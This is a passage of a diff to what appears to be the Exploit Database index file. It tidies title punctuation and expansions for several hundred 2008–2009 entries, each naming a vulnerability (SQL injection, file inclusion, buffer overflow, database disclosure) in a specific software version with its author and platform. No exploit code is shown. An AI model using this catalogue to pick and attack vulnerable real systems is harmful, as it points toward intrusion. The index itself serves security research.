7363,platforms/php/webapps/7363.txt,"phpPgAdmin 4.2.1 - (_language) Local File Inclusion",2008-12-06,dun,php,webapps,0 7364,platforms/php/webapps/7364.php,"IPNPro3 <= 1.44 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 @@ -6948,20 +6949,20 @@ id,file,description,date,author,platform,type,port 7404,platforms/cgi/webapps/7404.txt,"HTMPL 1.11 - (htmpl_admin.cgi help) Command Execution",2008-12-10,ZeN,cgi,webapps,0 7405,platforms/linux/dos/7405.c,"Linux Kernel 2.6.27.8 - ATMSVC Local Denial of Service",2008-12-10,"Jon Oberheide",linux,dos,0 7406,platforms/php/webapps/7406.php,"eZ Publish < 3.9.5/3.10.1/4.0.1 - Privilege Escalation",2008-12-10,s4avrd0w,php,webapps,0 -7407,platforms/php/webapps/7407.txt,"Webmaster Marketplace - 'member.php u'SQL Injection",2008-12-10,"Hussin X",php,webapps,0 +7407,platforms/php/webapps/7407.txt,"Webmaster Marketplace - 'member.php u' SQL Injection",2008-12-10,"Hussin X",php,webapps,0 7408,platforms/php/webapps/7408.txt,"living Local 1.1 - (Cross-Site Scripting / Arbitrary File Upload) Multiple Vulnerabilities",2008-12-10,Bgh7,php,webapps,0 7409,platforms/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2008-12-10,ZynbER,php,webapps,0 7410,platforms/windows/remote/7410.htm,"Microsoft Internet Explorer - XML Parsing Buffer Overflow (Windows Vista)",2008-12-10,muts,windows,remote,0 7411,platforms/php/webapps/7411.txt,"Butterfly Organizer 2.0.1 - (view.php id) SQL Injection",2008-12-10,Osirys,php,webapps,0 7412,platforms/asp/webapps/7412.txt,"cf shopkart 5.2.2 - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-10,AlpHaNiX,asp,webapps,0 -7413,platforms/asp/webapps/7413.pl,"CF_Calendar - 'calendarevent.cfm'SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 +7413,platforms/asp/webapps/7413.pl,"CF_Calendar - 'calendarevent.cfm' SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 7414,platforms/asp/webapps/7414.txt,"CF_Auction - (forummessage) Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 -7415,platforms/asp/webapps/7415.txt,"CFMBLOG - 'index.cfm categorynbr'Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 +7415,platforms/asp/webapps/7415.txt,"CFMBLOG - 'index.cfm categorynbr' Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 7416,platforms/asp/webapps/7416.txt,"CF_Forum - Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 7417,platforms/php/webapps/7417.txt,"phpAddEdit 1.3 - (editform) Local File Inclusion",2008-12-10,nuclear,php,webapps,0 7418,platforms/php/webapps/7418.txt,"PhpAddEdit 1.3 - (Cookie) Login Bypass",2008-12-11,x0r,php,webapps,0 7419,platforms/asp/webapps/7419.txt,"evCal Events Calendar - Database Disclosure",2008-12-11,Cyber-Zone,asp,webapps,0 -7420,platforms/asp/webapps/7420.txt,"MyCal Personal Events Calendar - 'mycal.mdb'Database Disclosure",2008-12-11,CoBRa_21,asp,webapps,0 +7420,platforms/asp/webapps/7420.txt,"MyCal Personal Events Calendar - 'mycal.mdb' Database Disclosure",2008-12-11,CoBRa_21,asp,webapps,0 7421,platforms/php/webapps/7421.txt,"eZ Publish 3.9.0/3.9.5/3.10.1 - Command Execution Exploit (Admin req)",2008-12-11,s4avrd0w,php,webapps,0 7422,platforms/php/webapps/7422.txt,"Feed CMS 1.07.03.19b - (lang) Local File Inclusion",2008-12-11,x0r,php,webapps,0 7423,platforms/asp/webapps/7423.txt,"Affiliate Software Java 4.0 - (Authentication Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0 @@ -6987,11 +6988,11 @@ id,file,description,date,author,platform,type,port 7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO - (Authentication Bypass) SQL Injection",2008-12-14,Osirys,php,webapps,0 7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - (File Disclosure / Remote File Inclusion) Multiple Vulnerabilities",2008-12-14,Osirys,php,webapps,0 7445,platforms/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0 -7446,platforms/asp/webapps/7446.txt,"ASPired2Quote - 'quote.mdb'Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0 +7446,platforms/asp/webapps/7446.txt,"ASPired2Quote - 'quote.mdb' Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0 7447,platforms/asp/webapps/7447.txt,"ASP-DEV Internal E-Mail System - (Authentication Bypass) SQL Injection",2008-12-14,Pouya_Server,asp,webapps,0 7448,platforms/php/webapps/7448.txt,"autositephp 2.0.3 - (Local File Inclusion / Cross-Site Request Forgery/Edit File) Multiple Vulnerabilities",2008-12-14,SirGod,php,webapps,0 7449,platforms/php/webapps/7449.txt,"iyzi Forum 1.0b3 - (iyziforum.mdb) Database Disclosure",2008-12-14,"Ghost Hacker",php,webapps,0 -7450,platforms/asp/webapps/7450.txt,"CodeAvalanche FreeForum - 'CAForum.mdb'Database Disclosure",2008-12-14,"Ghost Hacker",asp,webapps,0 +7450,platforms/asp/webapps/7450.txt,"CodeAvalanche FreeForum - 'CAForum.mdb' Database Disclosure",2008-12-14,"Ghost Hacker",asp,webapps,0 7451,platforms/php/webapps/7451.txt,"PHP weather 2.2.2 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-12-14,ahmadbady,php,webapps,0 7452,platforms/windows/remote/7452.pl,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - Universal Remote Buffer Overflow Exploit",2008-12-14,SkD,windows,remote,69 7453,platforms/php/webapps/7453.txt,"FLDS 1.2a - (redir.php id) SQL Injection",2008-12-14,nuclear,php,webapps,0 @@ -7009,11 +7010,11 @@ id,file,description,date,author,platform,type,port 7465,platforms/php/webapps/7465.txt,"isweb CMS 3.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-12-14,XaDoS,php,webapps,0 7466,platforms/asp/webapps/7466.txt,"Forest Blog 1.3.2 - (blog.mdb) Remote Database Disclosure",2008-12-15,"Cold Zero",asp,webapps,0 7467,platforms/multiple/dos/7467.txt,"Amaya Web Browser 10.0.1/10.1-pre5 - (html tag) Buffer Overflow (PoC)",2008-12-15,webDEViL,multiple,dos,0 -7468,platforms/asp/webapps/7468.txt,"CodeAvalanche Directory - 'CADirectory.mdb'Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 -7469,platforms/asp/webapps/7469.txt,"CodeAvalanche FreeForAll - 'CAFFAPage.mdb'Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 +7468,platforms/asp/webapps/7468.txt,"CodeAvalanche Directory - 'CADirectory.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 +7469,platforms/asp/webapps/7469.txt,"CodeAvalanche FreeForAll - 'CAFFAPage.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 7470,platforms/asp/webapps/7470.txt,"CodeAvalanche FreeWallpaper - Remote Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 -7471,platforms/asp/webapps/7471.txt,"CodeAvalanche Articles - 'CAArticles.mdb'Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 -7472,platforms/asp/webapps/7472.txt,"CodeAvalanche RateMySite - 'CARateMySite.mdb'Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 +7471,platforms/asp/webapps/7471.txt,"CodeAvalanche Articles - 'CAArticles.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 +7472,platforms/asp/webapps/7472.txt,"CodeAvalanche RateMySite - 'CARateMySite.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 7473,platforms/php/webapps/7473.php,"eZ Publish < 3.9.5/3.10.1/4.0.1 - (token) Privilege Escalation",2008-12-15,s4avrd0w,php,webapps,0 7474,platforms/php/webapps/7474.txt,"FLDS 1.2a - (lpro.php id) SQL Injection",2008-12-15,nuclear,php,webapps,0 7475,platforms/php/webapps/7475.txt,"BabbleBoard 1.1.6 - (username) Cross-Site Request Forgery/Cookie Grabber Exploit",2008-12-15,SirGod,php,webapps,0 @@ -7024,17 +7025,17 @@ id,file,description,date,author,platform,type,port 7480,platforms/php/webapps/7480.txt,"CadeNix - 'cid' SQL Injection",2008-12-15,HaCkeR_EgY,php,webapps,0 7481,platforms/php/webapps/7481.txt,"WorkSimple 1.2.1 - Remote File Inclusion / Sensitive Data Disclosure",2008-12-15,Osirys,php,webapps,0 7482,platforms/php/webapps/7482.txt,"Aperto Blog 0.1.1 - Local File Inclusion / SQL Injection",2008-12-15,NoGe,php,webapps,0 -7483,platforms/php/webapps/7483.txt,"CFAGCMS 1 - 'right.php title'SQL Injection",2008-12-15,ZoRLu,php,webapps,0 +7483,platforms/php/webapps/7483.txt,"CFAGCMS 1 - 'right.php title' SQL Injection",2008-12-15,ZoRLu,php,webapps,0 7484,platforms/asp/webapps/7484.txt,"Click&BaneX - Multiple SQL Injections",2008-12-15,AlpHaNiX,asp,webapps,0 7485,platforms/asp/webapps/7485.txt,"clickandemail - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-12-15,AlpHaNiX,asp,webapps,0 -7486,platforms/asp/webapps/7486.txt,"click&rank - SQL / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0 +7486,platforms/asp/webapps/7486.txt,"click&rank - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0 7487,platforms/php/webapps/7487.txt,"FaScript FaUpload - 'download.php' SQL Injection",2008-12-16,"Aria-Security Team",php,webapps,0 7488,platforms/asp/webapps/7488.txt,"Web Wiz GuestBook 8.21 - (WWGguestbook.mdb) DD",2008-12-16,"Cold Zero",asp,webapps,0 7489,platforms/php/webapps/7489.pl,"FLDS 1.2a - report.php (linkida) SQL Injection",2008-12-16,ka0x,php,webapps,0 7490,platforms/php/webapps/7490.php,"Aiyoota! CMS - Blind SQL Injection",2008-12-16,Lidloses_Auge,php,webapps,0 7491,platforms/asp/webapps/7491.txt,"Nukedit 4.9.8 - Remote Database Disclosure",2008-12-16,Cyber.Zer0,asp,webapps,0 7492,platforms/windows/local/7492.py,"Realtek Sound Manager (rtlrack.exe 1.15.0.0) - Playlist Buffer Overflow Exploit",2008-12-16,shinnai,windows,local,0 -7493,platforms/php/webapps/7493.txt,"Liberum Help Desk 0.97.3 - SQL / DD",2008-12-16,"Cold Zero",php,webapps,0 +7493,platforms/php/webapps/7493.txt,"Liberum Help Desk 0.97.3 - SQL Injection / File Disclosure",2008-12-16,"Cold Zero",php,webapps,0 7494,platforms/php/webapps/7494.txt,"Zelta E Store - (Arbitrary File Upload / Bypass / SQL Injection / Blind SQL Injection) Multiple Vulnerabilities",2008-12-16,ZoRLu,php,webapps,0 7495,platforms/asp/webapps/7495.txt,"Gnews Publisher .NET - (authors.asp authorID) SQL Injection",2008-12-16,AlpHaNiX,asp,webapps,0 7496,platforms/hardware/remote/7496.txt,"Barracuda Spam Firewall 3.5.11.020 Model 600 - SQL Injection",2008-12-16,"Marian Ventuneac",hardware,remote,0 @@ -7048,7 +7049,7 @@ id,file,description,date,author,platform,type,port 7505,platforms/windows/remote/7505.html,"Phoenician Casino FlashAX - ActiveX Remote Code Execution Exploit",2008-12-17,e.wiZz!,windows,remote,0 7506,platforms/php/webapps/7506.txt,"TinyMCE 2.0.1 - (index.php menuID) SQL Injection",2008-12-17,AnGeL25dZ,php,webapps,0 7507,platforms/php/webapps/7507.pl,"Lizardware CMS 0.6.0 - Blind SQL Injection",2008-12-17,StAkeR,php,webapps,0 -7508,platforms/asp/webapps/7508.txt,"QuickerSite Easy CMS - 'QuickerSite.mdb'Database Disclosure",2008-12-17,AlpHaNiX,asp,webapps,0 +7508,platforms/asp/webapps/7508.txt,"QuickerSite Easy CMS - 'QuickerSite.mdb' Database Disclosure",2008-12-17,AlpHaNiX,asp,webapps,0 7509,platforms/php/webapps/7509.txt,"Mini File Host 1.x - Arbitrary PHP File Upload",2008-12-18,Pouya_Server,php,webapps,0 7510,platforms/php/webapps/7510.txt,"2532/Gigs 1.2.2 Stable - Multiple Vulnerabilities",2008-12-18,Osirys,php,webapps,0 7511,platforms/php/webapps/7511.txt,"2532/Gigs 1.2.2 Stable - Remote Login Bypass",2008-12-18,StAkeR,php,webapps,0 @@ -7059,13 +7060,13 @@ id,file,description,date,author,platform,type,port 7516,platforms/windows/local/7516.txt,"ESET Smart Security 3.0.672 - (epfw.sys) Privilege Escalation",2008-12-18,"NT Internals",windows,local,0 7517,platforms/php/webapps/7517.txt,"Injader CMS 2.1.1 - 'id' SQL Injection",2008-12-18,fuzion,php,webapps,0 7518,platforms/php/webapps/7518.txt,"Gobbl CMS 1.0 - Insecure Cookie Handling",2008-12-18,x0r,php,webapps,0 -7519,platforms/php/webapps/7519.txt,"MyPHPsite - 'index.php mod'Local File Inclusion",2008-12-18,Piker,php,webapps,0 +7519,platforms/php/webapps/7519.txt,"MyPHPsite - 'index.php mod' Local File Inclusion",2008-12-18,Piker,php,webapps,0 7520,platforms/multiple/dos/7520.c,"Avahi < 0.6.24 - (mDNS Daemon) Remote Denial of Service",2008-12-19,"Jon Oberheide",multiple,dos,0 7521,platforms/windows/remote/7521.txt,"WebcamXP 5.3.2.375 - Remote File Disclosure",2008-12-19,nicx0,windows,remote,0 -7522,platforms/php/webapps/7522.pl,"MyPBS - 'index.php seasonID'SQL Injection",2008-12-19,Piker,php,webapps,0 +7522,platforms/php/webapps/7522.pl,"MyPBS - 'index.php seasonID' SQL Injection",2008-12-19,Piker,php,webapps,0 7523,platforms/php/webapps/7523.php,"ReVou Twitter Clone - Admin Password Changing Exploit",2008-12-19,G4N0K,php,webapps,0 7524,platforms/php/webapps/7524.txt,"Online Keyword Research Tool - 'download.php' File Disclosure",2008-12-19,"Cold Zero",php,webapps,0 -7525,platforms/php/webapps/7525.txt,"Extract Website - 'download.php filename'File Disclosure",2008-12-19,"Cold Zero",php,webapps,0 +7525,platforms/php/webapps/7525.txt,"Extract Website - 'download.php filename' File Disclosure",2008-12-19,"Cold Zero",php,webapps,0 7526,platforms/php/webapps/7526.txt,"myPHPscripts Login Session 2.0 - Cross-Site Scripting / Database Disclosure",2008-12-19,Osirys,php,webapps,0 7527,platforms/php/webapps/7527.txt,"FreeLyrics 1.0 - (source.php p) Remote File Disclosure",2008-12-19,Piker,php,webapps,0 7528,platforms/php/webapps/7528.pl,"OneOrZero helpdesk 1.6.x. - Arbitrary File Upload",2008-12-19,Ams,php,webapps,0 @@ -7076,7 +7077,7 @@ id,file,description,date,author,platform,type,port 7533,platforms/windows/local/7533.txt,"PowerStrip 3.84 - (pstrip.sys) Privilege Escalation",2008-12-21,"NT Internals",windows,local,0 7534,platforms/asp/webapps/7534.txt,"Emefa GuestBook 3.0 - Remote Database Disclosure",2008-12-21,Cyber.Zer0,asp,webapps,0 7535,platforms/hardware/dos/7535.php,"Linksys Wireless ADSL Router (WAG54G v2) - httpd Denial of Service",2008-12-21,r0ut3r,hardware,dos,0 -7536,platforms/windows/local/7536.cpp,"CoolPlayer 2.19 - '.Skin'Local Buffer Overflow",2008-12-21,r0ut3r,windows,local,0 +7536,platforms/windows/local/7536.cpp,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow",2008-12-21,r0ut3r,windows,local,0 7537,platforms/php/webapps/7537.txt,"BLOG 1.55B - (image_upload.php) Arbitrary File Upload",2008-12-21,Piker,php,webapps,0 7538,platforms/php/webapps/7538.txt,"Joomla Component com_hbssearch 1.0 - Blind SQL Injection",2008-12-21,boom3rang,php,webapps,0 7539,platforms/php/webapps/7539.txt,"Joomla Component com_tophotelmodule 1.0 - Blind SQL Injection",2008-12-21,boom3rang,php,webapps,0 @@ -7146,11 +7147,11 @@ id,file,description,date,author,platform,type,port 7606,platforms/php/webapps/7606.txt,"FubarForum 1.6 - Authentication Bypass Change User Password",2008-12-29,R31P0l,php,webapps,0 7607,platforms/php/webapps/7607.pl,"Ultimate PHP Board 2.2.1 - (log inj) Privilege Escalation",2008-12-29,StAkeR,php,webapps,0 7608,platforms/windows/local/7608.py,"IntelliTamper 2.07/2.08 - (ProxyLogin) Local Stack Overflow",2008-12-29,His0k4,windows,local,0 -7609,platforms/asp/webapps/7609.txt,"Sepcity Shopping Mall - 'shpdetails.asp ID'SQL Injection",2008-12-29,Osmanizim,asp,webapps,0 -7610,platforms/asp/webapps/7610.txt,"Sepcity Lawyer Portal - 'deptdisplay.asp ID'SQL Injection",2008-12-29,Osmanizim,asp,webapps,0 +7609,platforms/asp/webapps/7609.txt,"Sepcity Shopping Mall - 'shpdetails.asp ID' SQL Injection",2008-12-29,Osmanizim,asp,webapps,0 +7610,platforms/asp/webapps/7610.txt,"Sepcity Lawyer Portal - 'deptdisplay.asp ID' SQL Injection",2008-12-29,Osmanizim,asp,webapps,0 7611,platforms/php/webapps/7611.php,"CMS NetCat 3.0/3.12 - Blind SQL Injection",2008-12-29,s4avrd0w,php,webapps,0 7612,platforms/php/webapps/7612.txt,"Joomla Component com_na_content 1.0 - Blind SQL Injection",2008-12-29,"Mehmet Ince",php,webapps,0 -7613,platforms/asp/webapps/7613.txt,"Sepcity Classified - 'classdis.asp ID'SQL Injection",2008-12-29,S.W.A.T.,asp,webapps,0 +7613,platforms/asp/webapps/7613.txt,"Sepcity Classified - 'classdis.asp ID' SQL Injection",2008-12-29,S.W.A.T.,asp,webapps,0 7614,platforms/php/webapps/7614.txt,"FlexPHPDirectory 0.0.1 - (Authentication Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0 7615,platforms/php/webapps/7615.txt,"Flexphpsite 0.0.1 - (Authentication Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0 7616,platforms/php/webapps/7616.txt,"Flexphplink 0.0.x - (Authentication Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0 @@ -7202,13 +7203,13 @@ id,file,description,date,author,platform,type,port 7662,platforms/windows/local/7662.py,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (5)",2009-01-04,suN8Hclf,windows,local,0 7663,platforms/php/webapps/7663.txt,"plxAutoReminder 3.7 - 'id' SQL Injection",2009-01-04,ZoRLu,php,webapps,0 7664,platforms/php/webapps/7664.pl,"The Rat CMS Alpha 2 - 'viewarticle.php id' Blind SQL Injection",2009-01-04,darkjoker,php,webapps,0 -7665,platforms/asp/webapps/7665.txt,"Ayemsis Emlak Pro - 'acc.mdb'Database Disclosure",2009-01-05,ByALBAYX,asp,webapps,0 +7665,platforms/asp/webapps/7665.txt,"Ayemsis Emlak Pro - 'acc.mdb' Database Disclosure",2009-01-05,ByALBAYX,asp,webapps,0 7666,platforms/asp/webapps/7666.txt,"Ayemsis Emlak Pro - (Authentication Bypass) SQL Injection",2009-01-05,ByALBAYX,asp,webapps,0 7667,platforms/php/webapps/7667.txt,"Joomla Component simple_review 1.x - SQL Injection",2009-01-05,EcHoLL,php,webapps,0 7668,platforms/php/webapps/7668.pl,"Cybershade CMS 0.2b - 'index.php' Remote File Inclusion Exploit",2009-01-05,JosS,php,webapps,0 7669,platforms/php/webapps/7669.pl,"Joomla com_na_newsdescription - (newsid) SQL Injection",2009-01-05,EcHoLL,php,webapps,0 7670,platforms/php/webapps/7670.pl,"Joomla com_phocadocumentation - 'id' SQL Injection",2009-01-05,EcHoLL,php,webapps,0 -7671,platforms/windows/local/7671.pl,"VUPlayer 2.49 - '.wax'Local Buffer Overflow",2009-01-05,Houssamix,windows,local,0 +7671,platforms/windows/local/7671.pl,"VUPlayer 2.49 - '.wax' Local Buffer Overflow",2009-01-05,Houssamix,windows,local,0 7672,platforms/php/webapps/7672.txt,"phpauctionsystem - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-05,x0r,php,webapps,0 7673,platforms/multiple/dos/7673.html,"Safari - (Arguments) Array Integer Overflow PoC (New Heap Spray)",2009-01-05,Skylined,multiple,dos,0 7674,platforms/php/webapps/7674.txt,"PHPAuctionSystem - Insecure Cookie Handling",2009-01-05,ZoRLu,php,webapps,0 @@ -7226,17 +7227,17 @@ id,file,description,date,author,platform,type,port 7686,platforms/php/webapps/7686.txt,"ItCMS 2.1a - (Authentication Bypass) SQL Injection",2009-01-06,certaindeath,php,webapps,0 7687,platforms/php/webapps/7687.txt,"playSms 0.9.3 - Multiple Remote / Local File Inclusion",2009-01-06,ahmadbady,php,webapps,0 7688,platforms/windows/local/7688.pl,"Cain & Abel 4.9.25 - (Cisco IOS-MD5) Local Buffer Overflow",2009-01-07,send9,windows,local,0 -7689,platforms/php/webapps/7689.txt,"BlogHelper - 'common_db.inc'Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0 -7690,platforms/php/webapps/7690.txt,"PollHelper - 'poll.inc'Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0 +7689,platforms/php/webapps/7689.txt,"BlogHelper - 'common_db.inc' Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0 +7690,platforms/php/webapps/7690.txt,"PollHelper - 'poll.inc' Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0 7691,platforms/php/webapps/7691.php,"Joomla 1.5.8 - (xstandard editor) Local Directory Traversal",2009-01-07,irk4z,php,webapps,0 7692,platforms/windows/local/7692.pl,"CoolPlayer 2.19 - (PlaylistSkin) Buffer Overflow",2009-01-07,"Jeremy Brown",windows,local,0 7693,platforms/windows/dos/7693.pl,"Perception LiteServe 2.0.1 - (user) Remote Buffer Overflow (PoC)",2009-01-07,Houssamix,windows,dos,0 -7694,platforms/windows/dos/7694.py,"Audacity 1.6.2 - '.aup'Remote Off-by-One Crash Exploit",2009-01-07,Stack,windows,dos,0 +7694,platforms/windows/dos/7694.py,"Audacity 1.6.2 - '.aup' Remote Off-by-One Crash Exploit",2009-01-07,Stack,windows,dos,0 7695,platforms/windows/local/7695.pl,"VUPlayer 2.49 - '.pls' Universal Buffer Overflow",2009-01-07,SkD,windows,local,0 7696,platforms/windows/dos/7696.pl,"WinAmp GEN_MSN Plugin - Heap Buffer Overflow (PoC)",2009-01-07,SkD,windows,dos,0 7697,platforms/php/webapps/7697.txt,"PHP-Fusion Mod Members CV (job) 1.0 - SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0 7698,platforms/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 - (items.php CA) SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0 -7699,platforms/php/webapps/7699.txt,"QuoteBook - 'poll.inc'Remote Config File Disclosure",2009-01-07,Moudi,php,webapps,0 +7699,platforms/php/webapps/7699.txt,"QuoteBook - 'poll.inc' Remote Config File Disclosure",2009-01-07,Moudi,php,webapps,0 7700,platforms/php/webapps/7700.php,"CuteNews 1.4.6 - (ip ban) Cross-Site Scripting / Command Execution Exploit (Administrator Required)",2009-01-08,StAkeR,php,webapps,0 7701,platforms/linux/remote/7701.txt,"Samba < 3.0.20 - Remote Heap Overflow",2009-01-08,zuc,linux,remote,445 7702,platforms/windows/local/7702.c,"GOM Player 2.0.12.3375 - '.asx' Stack Overflow",2009-01-08,DATA_SNIPER,windows,local,0 @@ -7262,12 +7263,12 @@ id,file,description,date,author,platform,type,port 7722,platforms/php/webapps/7722.txt,"DZcms 3.1 - (products.php pcat) SQL Injection",2009-01-11,"Glafkos Charalambous ",php,webapps,0 7723,platforms/php/webapps/7723.txt,"Seo4SMF for SMF forums - Multiple Vulnerabilities",2009-01-11,WHK,php,webapps,0 7724,platforms/php/webapps/7724.php,"phpMDJ 1.0.3 - (id_animateur) Blind SQL Injection",2009-01-11,darkjoker,php,webapps,0 -7725,platforms/php/webapps/7725.txt,"XOOPS Module tadbook2 - 'open_book.php book_sn'SQL Injection",2009-01-11,stylextra,php,webapps,0 +7725,platforms/php/webapps/7725.txt,"XOOPS Module tadbook2 - 'open_book.php book_sn' SQL Injection",2009-01-11,stylextra,php,webapps,0 7726,platforms/php/webapps/7726.txt,"BKWorks ProPHP 0.50b1 - (Authentication Bypass) SQL Injection",2009-01-11,SirGod,php,webapps,0 7727,platforms/windows/local/7727.pl,"Microsoft HTML Workshop 4.74 - Universal Buffer Overflow",2009-01-12,SkD,windows,local,0 7728,platforms/php/webapps/7728.txt,"Weight Loss Recipe Book 3.1 - (Authentication Bypass) SQL Injection",2009-01-11,x0r,php,webapps,0 7729,platforms/php/webapps/7729.txt,"PHP-Fusion Mod the_kroax (comment_id) - SQL Injection",2009-01-11,FasTWORM,php,webapps,0 -7730,platforms/php/webapps/7730.txt,"Social Engine - 'browse_classifieds.php s'SQL Injection",2009-01-11,snakespc,php,webapps,0 +7730,platforms/php/webapps/7730.txt,"Social Engine - 'browse_classifieds.php s' SQL Injection",2009-01-11,snakespc,php,webapps,0 7731,platforms/php/webapps/7731.txt,"fttss 2.0 - Remote Command Execution",2009-01-11,dun,php,webapps,0 7732,platforms/php/webapps/7732.php,"Silentum Uploader 1.4.0 - Remote File Deletion Exploit",2009-01-11,"Danny Moules",php,webapps,0 7733,platforms/php/webapps/7733.txt,"Photobase 1.2 - (language) Local File Inclusion",2009-01-11,Osirys,php,webapps,0 @@ -7280,7 +7281,7 @@ id,file,description,date,author,platform,type,port 7740,platforms/php/webapps/7740.txt,"PWP Wiki Processor 1-5-1 - Remote File Upload",2009-01-12,ahmadbady,php,webapps,0 7741,platforms/asp/webapps/7741.txt,"dMx READY (25 - Products) Remote Database Disclosure",2009-01-12,Cyber-Zone,asp,webapps,0 7742,platforms/windows/dos/7742.txt,"Winamp 5.541 - '.mp3'/'.aiff' Multiple Denial of Services",2009-01-12,securfrog,windows,dos,0 -7743,platforms/php/webapps/7743.txt,"Realtor 747 - 'define.php INC_DIR'Remote File Inclusion",2009-01-12,ahmadbady,php,webapps,0 +7743,platforms/php/webapps/7743.txt,"Realtor 747 - 'define.php INC_DIR' Remote File Inclusion",2009-01-12,ahmadbady,php,webapps,0 7744,platforms/asp/webapps/7744.txt,"Virtual GuestBook 2.1 - Remote Database Disclosure",2009-01-13,Moudi,asp,webapps,0 7745,platforms/windows/local/7745.py,"VUPlayer 2.49 - '.asx' (Universal) Local Buffer Overflow",2009-01-13,"Encrypt3d.M!nd ",windows,local,0 7746,platforms/php/webapps/7746.txt,"Joomla Component com_gigcal (gigcal_gigs_id) 1.0 - SQL Injection",2009-01-13,boom3rang,php,webapps,0 @@ -7302,7 +7303,7 @@ id,file,description,date,author,platform,type,port 7762,platforms/windows/remote/7762.html,"EDraw Office Viewer 5.4 - HttpDownloadFile() Insecure Method",2009-01-14,Cyber-Zone,windows,remote,0 7763,platforms/windows/remote/7763.html,"Excel Viewer OCX 3.2 - Remote Command Execution Exploit",2009-01-14,Stack,windows,remote,0 7764,platforms/php/webapps/7764.txt,"DMXReady Blog Manager 1.1 - Remote File Delete",2009-01-14,ajann,php,webapps,0 -7765,platforms/windows/local/7765.py,"OTSTurntables 1.00.027 - '.ofl'Local Stack Overflow",2009-01-14,suN8Hclf,windows,local,0 +7765,platforms/windows/local/7765.py,"OTSTurntables 1.00.027 - '.ofl' Local Stack Overflow",2009-01-14,suN8Hclf,windows,local,0 7766,platforms/asp/webapps/7766.txt,"DMXReady Catalog Manager 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps,0 7767,platforms/asp/webapps/7767.txt,"DMXReady Classified Listings Manager 1.1 - SQL Injection",2009-01-14,ajann,asp,webapps,0 7768,platforms/asp/webapps/7768.txt,"DMXReady Contact Us Manager 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps,0 @@ -7354,7 +7355,7 @@ id,file,description,date,author,platform,type,port 7815,platforms/php/webapps/7815.txt,"Joomla Component Gigcal 1.x - 'id' SQL Injection",2009-01-18,Lanti-Net,php,webapps,0 7816,platforms/asp/webapps/7816.txt,"DS-IPN.NET Digital Sales IPN - Database Disclosure",2009-01-18,Moudi,asp,webapps,0 7817,platforms/php/webapps/7817.txt,"Click&Email - (Authentication Bypass) SQL Injection",2009-01-18,SuB-ZeRo,php,webapps,0 -7818,platforms/php/webapps/7818.txt,"SCMS 1 - 'index.php p'Local File Inclusion",2009-01-18,ahmadbady,php,webapps,0 +7818,platforms/php/webapps/7818.txt,"SCMS 1 - 'index.php p' Local File Inclusion",2009-01-18,ahmadbady,php,webapps,0 7819,platforms/php/webapps/7819.txt,"ESPG (Enhanced Simple PHP Gallery) 1.72 - File Disclosure",2009-01-18,bd0rk,php,webapps,0 7820,platforms/php/webapps/7820.pl,"Fhimage 1.2.1 - Remote Index Change Exploit",2009-01-19,Osirys,php,webapps,0 7821,platforms/php/webapps/7821.pl,"Fhimage 1.2.1 - Remote Command Execution Exploit (mq = off)",2009-01-19,Osirys,php,webapps,0 @@ -7567,7 +7568,7 @@ id,file,description,date,author,platform,type,port 8037,platforms/multiple/remote/8037.txt,"ProFTPd with mod_mysql - Authentication Bypass",2009-02-10,gat3way,multiple,remote,0 8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 - (jumpUrl) Remote File Disclosure Exploit",2009-02-10,Lolek,php,webapps,0 8039,platforms/php/webapps/8039.txt,"SkaDate Online 7 - Arbitrary File Upload",2009-02-11,ZoRLu,php,webapps,0 -8040,platforms/php/webapps/8040.txt,"Graugon Gallery 1.0 - Cross-Site Scripting / SQL / Cookie Bypass",2009-02-11,x0r,php,webapps,0 